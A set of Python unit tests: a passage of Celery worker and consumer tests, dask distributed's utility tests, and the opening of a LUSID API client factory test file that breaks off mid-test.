l.pidbox_node = MockNode()
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
l.receive_message(m.decode(), m)
@patch("celery.utils.timer2.to_timestamp")
def test_receive_message_eta_OverflowError(self, to_timestamp):
to_timestamp.side_effect = OverflowError()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=("2, 2"),
kwargs={},
eta=datetime.now().isoformat())
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.update_strategies()
l.receive_message(m.decode(), m)
self.assertTrue(m.acknowledged)
self.assertTrue(to_timestamp.call_count)
def test_receive_message_InvalidTaskError(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=(1, 2), kwargs="foobarbaz", id=1)
l.update_strategies()
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.receive_message(m.decode(), m)
self.assertIn("Received invalid task message",
logger.error.call_args[0][0])
def test_on_decode_error(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
class MockMessage(Mock):
content_type = "application/x-msgpack"
content_encoding = "binary"
body = "foobarbaz"
message = MockMessage()
l.on_decode_error(message, KeyError("foo"))
self.assertTrue(message.ack.call_count)
self.assertIn("Can't decode message body",
logger.critical.call_args[0][0])
def test_receieve_message(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=[2, 4, 8], kwargs={})
l.update_strategies()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
in_bucket = self.ready_queue.get_nowait()
self.assertIsInstance(in_bucket, Request)
self.assertEqual(in_bucket.task_name, foo_task.name)
self.assertEqual(in_bucket.execute(), 2 * 4 * 8)
self.assertTrue(self.eta_schedule.empty())
def test_start_connection_error(self):
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.connection_errors = (KeyError, )
with self.assertRaises(SyntaxError):
l.start()
l.heart.stop()
l.priority_timer.stop()
def test_start_channel_error(self):
# Regression test for AMQPChannelExceptions that can occur within the
# consumer. (i.e. 404 errors)
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.channel_errors = (KeyError, )
self.assertRaises(SyntaxError, l.start)
l.heart.stop()
l.priority_timer.stop()
def test_consume_messages_ignores_socket_timeout(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.timeout(10)
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.task_consumer = Mock()
l.connection.obj = l
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
def test_consume_messages_when_socket_error(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.error("foo")
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
c = l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
with self.assertRaises(socket.error):
l.consume_messages()
l._state = CLOSE
l.connection = c
l.consume_messages()
def test_consume_messages(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
l.consume_messages()
self.assertTrue(l.task_consumer.consume.call_count)
l.task_consumer.qos.assert_called_with(prefetch_count=10)
l.qos.decrement()
l.consume_messages()
l.task_consumer.qos.assert_called_with(prefetch_count=9)
def test_maybe_conn_error(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection_errors = (KeyError, )
l.channel_errors = (SyntaxError, )
l.maybe_conn_error(Mock(side_effect=AttributeError("foo")))
l.maybe_conn_error(Mock(side_effect=KeyError("foo")))
l.maybe_conn_error(Mock(side_effect=SyntaxError("foo")))
with self.assertRaises(IndexError):
l.maybe_conn_error(Mock(side_effect=IndexError("foo")))
def test_apply_eta_task(self):
from celery.worker import state
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(None, 10, l.logger)
task = object()
qos = l.qos.value
l.apply_eta_task(task)
self.assertIn(task, state.reserved_requests)
self.assertEqual(l.qos.value, qos - 1)
self.assertIs(self.ready_queue.get_nowait(), task)
def test_receieve_message_eta_isoformat(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
eta=datetime.now().isoformat(),
args=[2, 4, 8], kwargs={})
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, l.initial_prefetch_count, l.logger)
l.event_dispatcher = Mock()
l.enabled = False
l.update_strategies()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
items = [entry[2] for entry in self.eta_schedule.queue]
found = 0
for item in items:
if item.args[0].name == foo_task.name:
found = True
self.assertTrue(found)
self.assertTrue(l.task_consumer.qos.call_count)
l.eta_schedule.stop()
def test_on_control(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
l.reset_pidbox_node = Mock()
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = KeyError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = ValueError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.reset_pidbox_node.assert_called_with()
def test_revoke(self):
ready_queue = FastQueue()
l = MyKombuConsumer(ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
id = uuid()
t = create_message(backend, task=foo_task.name, args=[2, 4, 8],
kwargs={}, id=id)
from celery.worker.state import revoked
revoked.add(id)
l.receive_message(t.decode(), t)
self.assertTrue(ready_queue.empty())
def test_receieve_message_not_registered(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, task="x.X.31x", args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
def test_receieve_message_ack_raises(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
l.connection_errors = (socket.error, )
l.logger = Mock()
m.ack = Mock()
m.ack.side_effect = socket.error("foo")
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
m.ack.assert_called_with()
self.assertTrue(l.logger.critical.call_count)
def test_receieve_message_eta(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.event_dispatcher = Mock()
l.event_dispatcher._outbound_buffer = deque()
backend = Mock()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={},
eta=(datetime.now() +
timedelta(days=1)).isoformat())
l.reset_connection()
p = l.app.conf.BROKER_CONNECTION_RETRY
l.app.conf.BROKER_CONNECTION_RETRY = False
try:
l.reset_connection()
finally:
l.app.conf.BROKER_CONNECTION_RETRY = p
l.stop_consumers()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
in_hold = self.eta_schedule.queue[0]
self.assertEqual(len(in_hold), 3)
eta, priority, entry = in_hold
task = entry.args[0]
self.assertIsInstance(task, Request)
self.assertEqual(task.task_name, foo_task.name)
self.assertEqual(task.execute(), 2 * 4 * 8)
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
def test_reset_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
chan = l.pidbox_node.channel = Mock()
l.connection = Mock()
chan.close.side_effect = socket.error("foo")
l.connection_errors = (socket.error, )
l.reset_pidbox_node()
chan.close.assert_called_with()
def test_reset_pidbox_node_green(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pool = Mock()
l.pool.is_green = True
l.reset_pidbox_node()
l.pool.spawn_n.assert_called_with(l._green_pidbox_node)
def test__green_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
class BConsumer(Mock):
def __enter__(self):
self.consume()
return self
def __exit__(self, *exc_info):
self.cancel()
l.pidbox_node.listen = BConsumer()
connections = []
class Connection(object):
def __init__(self, obj):
connections.append(self)
self.obj = obj
self.default_channel = self.channel()
self.closed = False
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def channel(self):
return Mock()
def drain_events(self, **kwargs):
self.obj.connection = None
self.obj._pidbox_node_shutdown.set()
def close(self):
self.closed = True
l.connection = Mock()
l._open_connection = lambda: Connection(obj=l)
l._green_pidbox_node()
l.pidbox_node.listen.assert_called_with(callback=l.on_control)
self.assertTrue(l.broadcast_consumer)
l.broadcast_consumer.consume.assert_called_with()
self.assertIsNone(l.connection)
self.assertTrue(connections[0].closed)
def test_start__consume_messages(self):
class _QoS(object):
prev = 3
value = 4
def update(self):
self.prev = self.value
class _Consumer(MyKombuConsumer):
iterations = 0
def reset_connection(self):
if self.iterations >= 1:
raise KeyError("foo")
init_callback = Mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.qos = _QoS()
l.connection = BrokerConnection()
l.iterations = 0
def raises_KeyError(limit=None):
l.iterations += 1
if l.qos.prev != l.qos.value:
l.qos.update()
if l.iterations >= 2:
raise KeyError("foo")
l.consume_messages = raises_KeyError
with self.assertRaises(KeyError):
l.start()
self.assertTrue(init_callback.call_count)
self.assertEqual(l.iterations, 1)
self.assertEqual(l.qos.prev, l.qos.value)
init_callback.reset_mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.qos = _QoS()
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.connection = BrokerConnection()
l.consume_messages = Mock(side_effect=socket.error("foo"))
with self.assertRaises(socket.error):
l.start()
self.assertTrue(init_callback.call_count)
self.assertTrue(l.consume_messages.call_count)
def test_reset_connection_with_no_node(self):
l = MainConsumer(self.ready_queue, self.eta_schedule, self.logger)
self.assertEqual(None, l.pool)
l.reset_connection()
class test_WorkController(AppCase):
def setup(self):
self.worker = self.create_worker()
def create_worker(self, **kw):
worker = WorkController(concurrency=1, loglevel=0, **kw)
worker._shutdown_complete.set()
worker.logger = Mock()
return worker
@patch("celery.platforms.signals")
@patch("celery.platforms.set_mp_process_title")
def test_process_initializer(self, set_mp_process_title, _signals):
from celery import Celery
from celery import signals
from celery.app import _tls
from celery.concurrency.processes import process_initializer
from celery.concurrency.processes import (WORKER_SIGRESET,
WORKER_SIGIGNORE)
def on_worker_process_init(**kwargs):
on_worker_process_init.called = True
on_worker_process_init.called = False
signals.worker_process_init.connect(on_worker_process_init)
loader = Mock()
app = Celery(loader=loader, set_as_current=False)
app.conf = AttributeDict(DEFAULTS)
process_initializer(app, "awesome.worker.com")
self.assertIn((tuple(WORKER_SIGIGNORE), {}),
_signals.ignore.call_args_list)
self.assertIn((tuple(WORKER_SIGRESET), {}),
_signals.reset.call_args_list)
self.assertTrue(app.loader.init_worker.call_count)
self.assertTrue(on_worker_process_init.called)
self.assertIs(_tls.current_app, app)
set_mp_process_title.assert_called_with("celeryd",
hostname="awesome.worker.com")
def test_with_rate_limits_disabled(self):
worker = WorkController(concurrency=1, loglevel=0,
disable_rate_limits=True)
self.assertTrue(hasattr(worker.ready_queue, "put"))
def test_attrs(self):
worker = self.worker
self.assertIsInstance(worker.scheduler, Timer)
self.assertTrue(worker.scheduler)
self.assertTrue(worker.pool)
self.assertTrue(worker.consumer)
self.assertTrue(worker.mediator)
self.assertTrue(worker.components)
def test_with_embedded_celerybeat(self):
worker = WorkController(concurrency=1, loglevel=0,
embed_clockservice=True)
self.assertTrue(worker.beat)
self.assertIn(worker.beat, worker.components)
def test_with_autoscaler(self):
worker = self.create_worker(autoscale=[10, 3], send_events=False,
eta_scheduler_cls="celery.utils.timer2.Timer")
self.assertTrue(worker.autoscaler)
def test_dont_stop_or_terminate(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.stop()
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate()
self.assertNotEqual(worker._state, worker.CLOSE)
sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False
try:
worker._state = worker.RUN
worker.stop(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
finally:
worker.pool.signal_safe = sigsafe
def test_on_timer_error(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.logger = Mock()
try:
raise KeyError("foo")
except KeyError:
exc_info = sys.exc_info()
worker.on_timer_error(exc_info)
msg, args = worker.logger.error.call_args[0]
self.assertIn("KeyError", msg % args)
def test_on_timer_tick(self):
worker = WorkController(concurrency=1, loglevel=10)
worker.logger = Mock()
worker.timer_debug = worker.logger.debug
worker.on_timer_tick(30.0)
xargs = worker.logger.debug.call_args[0]
fmt, arg = xargs[0], xargs[1]
self.assertEqual(30.0, arg)
self.assertIn("Next eta %s secs", fmt)
def test_process_task(self):
worker = self.worker
worker.pool = Mock()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
self.assertEqual(worker.pool.apply_async.call_count, 1)
worker.pool.stop()
def test_process_task_raise_base(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyboardInterrupt("Ctrl+C")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(KeyboardInterrupt):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_SystemTerminate(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = SystemTerminate()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(SystemExit):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_regular(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyError("some exception")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_start_catches_base_exceptions(self):
worker1 = self.create_worker()
stc = Mock()
stc.start.side_effect = SystemTerminate()
worker1.components = [stc]
worker1.start()
self.assertTrue(stc.terminate.call_count)
worker2 = self.create_worker()
sec = Mock()
sec.start.side_effect = SystemExit()
sec.terminate = None
worker2.components = [sec]
worker2.start()
self.assertTrue(sec.stop.call_count)
def test_state_db(self):
from celery.worker import state
Persistent = state.Persistent
state.Persistent = Mock()
try:
worker = self.create_worker(state_db="statefilename")
self.assertTrue(worker._persistence)
finally:
state.Persistent = Persistent
def test_disable_rate_limits_solo(self):
worker = self.create_worker(disable_rate_limits=True,
pool_cls="solo")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertIsNone(worker.mediator)
self.assertEqual(worker.ready_queue.put, worker.process_task)
def test_disable_rate_limits_processes(self):
try:
worker = self.create_worker(disable_rate_limits=True,
pool_cls="processes")
except ImportError:
raise SkipTest("multiprocessing not supported")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertTrue(worker.mediator)
self.assertNotEqual(worker.ready_queue.put, worker.process_task)
def test_start__stop(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock()]
worker.start()
for w in worker.components:
self.assertTrue(w.start.call_count)
worker.stop()
for component in worker.components:
self.assertTrue(w.stop.call_count)
def test_start__terminate(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock(), Mock()]
for component in worker.components[:3]:
component.terminate = None
worker.start()
for w in worker.components[:3]:
self.assertTrue(w.start.call_count)
self.assertTrue(worker._running, len(worker.components))
self.assertEqual(worker._state, RUN)
worker.terminate()
for component in worker.components[:3]:
self.assertTrue(component.stop.call_count)
self.assertTrue(worker.components[4].terminate.call_count)
|
test_utils.py
|
from __future__ import print_function, division, absolute_import
from collections import Iterator
from functools import partial
import io
import logging
import socket
from time import sleep
from threading import Thread
import threading
import traceback
import pytest
from tornado import gen
from tornado.ioloop import IOLoop
from tornado.locks import Event
import dask
from distributed.compatibility import Queue, isqueue, PY2
from distributed.metrics import time
from distributed.utils import (All, sync, is_kernel, ensure_ip, str_graph,
truncate_exception, get_traceback, queue_to_iterator,
iterator_to_queue, _maybe_complex, read_block, seek_delimiter,
funcname, ensure_bytes, open_port)
from distributed.utils_test import (loop, inc, throws, div, captured_handler,
captured_logger, has_ipv6)
def test_All(loop):
@gen.coroutine
def throws():
1 / 0
@gen.coroutine
def slow():
yield gen.sleep(10)
@gen.coroutine
def inc(x):
raise gen.Return(x + 1)
@gen.coroutine
def f():
results = yield All(*[inc(i) for i in range(10)])
assert results == list(range(1, 11))
start = time()
for tasks in [[throws(), slow()], [slow(), throws()]]:
try:
yield All(tasks)
assert False
except ZeroDivisionError:
pass
end = time()
assert end - start < 10
loop.run_sync(f)
def test_sync(loop):
e = Event()
e2 = threading.Event()
@gen.coroutine
def wait_until_event():
e2.set()
yield e.wait()
thread = Thread(target=loop.run_sync, args=(wait_until_event,))
thread.daemon = True
thread.start()
e2.wait()
result = sync(loop, inc, 1)
assert result == 2
loop.add_callback(e.set)
thread.join()
def test_sync_error(loop):
e = Event()
@gen.coroutine
def wait_until_event():
yield e.wait()
thread = Thread(target=loop.run_sync, args=(wait_until_event,))
thread.daemon = True
thread.start()
while not loop._running:
sleep(0.01)
try:
result = sync(loop, throws, 1)
except Exception as exc:
f = exc
assert 'hello' in str(exc)
tb = get_traceback()
L = traceback.format_tb(tb)
assert any('throws' in line for line in L)
def function1(x):
return function2(x)
def function2(x):
return throws(x)
try:
result = sync(loop, function1, 1)
except Exception as exc:
assert 'hello' in str(exc)
tb = get_traceback()
L = traceback.format_tb(tb)
assert any('function1' in line for line in L)
assert any('function2' in line for line in L)
loop.add_callback(e.set)
thread.join()
def test_sync_inactive_loop(loop):
@gen.coroutine
def f(x):
raise gen.Return(x + 1)
y = sync(loop, f, 1)
assert y == 2
def test_is_kernel():
pytest.importorskip('IPython')
assert is_kernel() is False
def test_ensure_ip():
assert ensure_ip('localhost') in ('127.0.0.1', '::1')
assert ensure_ip('123.123.123.123') == '123.123.123.123'
assert ensure_ip('8.8.8.8') == '8.8.8.8'
if has_ipv6():
assert ensure_ip('2001:4860:4860::8888') == '2001:4860:4860::8888'
assert ensure_ip('::1') == '::1'
def test_truncate_exception():
e = ValueError('a'*1000)
assert len(str(e)) >= 1000
f = truncate_exception(e, 100)
assert type(f) == type(e)
assert len(str(f)) < 200
assert 'aaaa' in str(f)
e = ValueError('a')
assert truncate_exception(e) is e
def test_get_traceback():
def a(x):
return div(x, 0)
def b(x):
return a(x)
def c(x):
return b(x)
try:
c(x)
except Exception as e:
tb = get_traceback()
assert type(tb).__name__ == 'traceback'
def test_queue_to_iterator():
q = Queue()
q.put(1)
q.put(2)
seq = queue_to_iterator(q)
assert isinstance(seq, Iterator)
assert next(seq) == 1
assert next(seq) == 2
def test_iterator_to_queue():
seq = iter([1, 2, 3])
q = iterator_to_queue(seq)
assert isqueue(q)
assert q.get() == 1
def test_str_graph():
dsk = {'x': 1}
assert str_graph(dsk) == dsk
dsk = {('x', 1): (inc, 1)}
assert str_graph(dsk) == {str(('x', 1)): (inc, 1)}
dsk = {('x', 1): (inc, 1), ('x', 2): (inc, ('x', 1))}
assert str_graph(dsk) == {str(('x', 1)): (inc, 1),
str(('x', 2)): (inc, str(('x', 1)))}
dsks = [{'x': 1},
{('x', 1): (inc, 1), ('x', 2): (inc, ('x', 1))},
{('x', 1): (sum, [1, 2, 3]),
('x', 2): (sum, [('x', 1), ('x', 1)])}]
for dsk in dsks:
sdsk = str_graph(dsk)
keys = list(dsk)
skeys = [str(k) for k in keys]
assert all(isinstance(k, str) for k in sdsk)
assert dask.get(dsk, keys) == dask.get(sdsk, skeys)
def test_maybe_complex():
assert not _maybe_complex(1)
assert not _maybe_complex('x')
assert _maybe_complex((inc, 1))
assert _maybe_complex([(inc, 1)])
assert _maybe_complex([(inc, 1)])
assert _maybe_complex({'x': (inc, 1)})
def test_read_block():
delimiter = b'\n'
data = delimiter.join([b'123', b'456', b'789'])
f = io.BytesIO(data)
assert read_block(f, 1, 2) == b'23'
assert read_block(f, 0, 1, delimiter=b'\n') == b'123\n'
assert read_block(f, 0, 2, delimiter=b'\n') == b'123\n'
assert read_block(f, 0, 3, delimiter=b'\n') == b'123\n'
assert read_block(f, 0, 5, delimiter=b'\n') == b'123\n456\n'
assert read_block(f, 0, 8, delimiter=b'\n') == b'123\n456\n789'
assert read_block(f, 0, 100, delimiter=b'\n') == b'123\n456\n789'
assert read_block(f, 1, 1, delimiter=b'\n') == b''
assert read_block(f, 1, 5, delimiter=b'\n') == b'456\n'
assert read_block(f, 1, 8, delimiter=b'\n') == b'456\n789'
for ols in [[(0, 3), (3, 3), (6, 3), (9, 2)],
[(0, 4), (4, 4), (8, 4)]]:
out = [read_block(f, o, l, b'\n') for o, l in ols]
assert b"".join(filter(None, out)) == data
def test_seek_delimiter_endline():
f = io.BytesIO(b'123\n456\n789')
# if at zero, stay at zero
seek_delimiter(f, b'\n', 5)
assert f.tell() == 0
# choose the first block
for bs in [1, 5, 100]:
f.seek(1)
seek_delimiter(f, b'\n', blocksize=bs)
assert f.tell() == 4
# handle long delimiters well, even with short blocksizes
f = io.BytesIO(b'123abc456abc789')
for bs in [1, 2, 3, 4, 5, 6, 10]:
f.seek(1)
seek_delimiter(f, b'abc', blocksize=bs)
assert f.tell() == 6
# End at the end
f = io.BytesIO(b'123\n456')
f.seek(5)
seek_delimiter(f, b'\n', 5)
assert f.tell() == 7
def test_funcname():
def f():
pass
assert funcname(f) == 'f'
assert funcname(partial(f)) == 'f'
assert funcname(partial(partial(f))) == 'f'
def test_ensure_bytes():
data = [b'1', '1', memoryview(b'1'), bytearray(b'1')]
if PY2:
data.append(buffer(b'1'))
for d in data:
result = ensure_bytes(d)
assert isinstance(result, bytes)
assert result == b'1'
def dump_logger_list():
root = logging.getLogger()
loggers = root.manager.loggerDict
print()
print("== Loggers (name, level, effective level, propagate) ==")
def logger_info(name, logger):
return (name, logging.getLevelName(logger.level),
logging.getLevelName(logger.getEffectiveLevel()),
logger.propagate)
infos = []
infos.append(logger_info('<root>', root))
for name, logger in sorted(loggers.items()):
if not isinstance(logger, logging.Logger):
# Skip 'PlaceHolder' objects
continue
assert logger.name == name
infos.append(logger_info(name, logger))
for info in infos:
print("%-40s %-8s %-8s %-5s" % info)
print()
def test_logging():
"""
Test default logging configuration.
"""
d = logging.getLogger('distributed')
assert len(d.handlers) == 1
assert isinstance(d.handlers[0], logging.StreamHandler)
# Work around Bokeh messing with the root logger level
# https://github.com/bokeh/bokeh/issues/5793
root = logging.getLogger('')
old_root_level = root.level
root.setLevel('WARN')
try:
dfb = logging.getLogger('distributed.foo.bar')
f = logging.getLogger('foo')
fb = logging.getLogger('foo.bar')
with captured_handler(d.handlers[0]) as distributed_log:
with captured_logger(root) as foreign_log:
h = logging.StreamHandler(foreign_log)
fmt = '[%(levelname)s in %(name)s] - %(message)s'
h.setFormatter(logging.Formatter(fmt))
fb.addHandler(h)
fb.propagate = False
# For debugging
dump_logger_list()
d.debug("1: debug")
d.info("2: info")
dfb.info("3: info")
fb.info("4: info")
fb.error("5: error")
f.info("6: info")
f.error("7: error")
distributed_log = distributed_log.getvalue().splitlines()
foreign_log = foreign_log.getvalue().splitlines()
# distributed log is configured at INFO level by default
assert distributed_log == [
"distributed - INFO - 2: info",
"distributed.foo.bar - INFO - 3: info",
]
# foreign logs should be unaffected by distributed's logging
# configuration. They get the default ERROR level from logging.
assert foreign_log == [
"[ERROR in foo.bar] - 5: error",
"7: error",
]
finally:
root.setLevel(old_root_level)
def test_open_port():
port = open_port()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', port))
s.close()
|
test_api_client_factory.py
|
import unittest
from collections import UserString
from datetime import datetime
from unittest.mock import patch
from urllib3 import PoolManager, ProxyManager
from parameterized import parameterized
from threading import Thread
from lusid import (InstrumentsApi, ResourceListOfInstrumentIdTypeDescriptor,
TCPKeepAlivePoolManager, TCPKeepAliveProxyManager)
from lusid.utilities import ApiClientFactory
from utilities import TokenUtilities as tu, CredentialsSource
from utilities.temp_file_manager import TempFileManager
from utilities import MockApiResponse
class UnknownApi:
pass
class UnknownImpl:
pass
source_config_details, config_keys = CredentialsSource.fetch_credentials(), CredentialsSource.fetch_config_keys()
class RefreshingToken(UserString):
def __init__(self):
token_data = {"expires": datetime.now(), "current_access_token": ""}
def get_token():
token_data["current_access_token"] = None
return token_data["current_access_token"]
self.access_token = get_token
def __getattribute__(self, name):
token = object.__getattribute__(self, "access_token")()
if name == "data":
return token
return token.__getattribute__(name)
class ApiFactory(unittest.TestCase):
def validate_api(self, api):
result = api.get_instrument_identifier_types()
self.assertIsNotNone(result)
self.assertIsInstance(result, ResourceListOfInstrumentIdTypeDescriptor)
self.assertGreater(len(result.values), 0)
@parameterized.expand([
["Unknown API", UnknownApi, "unknown api: UnknownApi"],
["Unknown Implementation", UnknownImpl, "unknown api: UnknownImpl"]
])
def test_get_unknown_api_throws_exception(self, _, api_to_build, error_message):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
with self.assertRaises(TypeError) as error:
factory.build(api_to_build)
self.assertEqual(error.exception.args[0], error_message)
def test_get_api_with_token(self):
token, refresh_token = tu.get_okta_tokens(CredentialsSource.secrets_path())
factory = ApiClientFactory(
token=token,
api_url=source_config_details["api_url"],
app_name=source_config_details["app_name"]
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_none_token(self):
factory = ApiClientFactory(
token=None,
api_url=source_config_details["api_url"],
app_name=source_config_details["app_name"],
api_secrets_filename=CredentialsSource.secrets_path(),
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_str_none_token(self):
factory = ApiClientFactory(
token=RefreshingToken(),
api_url=source_config_details["api_url"],
app_name=source_config_details["app_name"],
api_secrets_filename=CredentialsSource.secrets_path(),
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_token_url_as_env_var(self):
token, refresh_token = tu.get_okta_tokens(CredentialsSource.secrets_path())
with patch.dict('os.environ', {"FBN_LUSID_API_URL": source_config_details["api_url"]}, clear=True):
factory = ApiClientFactory(
token=token,
app_name=source_config_details["app_name"])
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_configuration(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_info(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
result = api.get_instrument_identifier_types(call_info=lambda r: print(r))
self.assertIsNotNone(result)
def test_get_info_with_invalid_param_throws_error(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
with self.assertRaises(ValueError) as error:
api.get_instrument_identifier_types(call_info="invalid param")
self.assertEqual(error.exception.args[0], "call_info value must be a lambda")
def test_wrapped_method(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
wrapped_scopes_api = factory.build(InstrumentsApi)
portfolio = InstrumentsApi(wrapped_scopes_api.api_client)
self.assertEqual(portfolio.__doc__, wrapped_scopes_api.__doc__)
self.assertEqual(portfolio.__module__, wrapped_scopes_api.__module__)
self.assertDictEqual(portfolio.__dict__, wrapped_scopes_api.__dict__)
def test_get_api_with_proxy_file(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
},
"proxy": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" in key
}
}
secrets["api"].pop("clientCertificate", None)
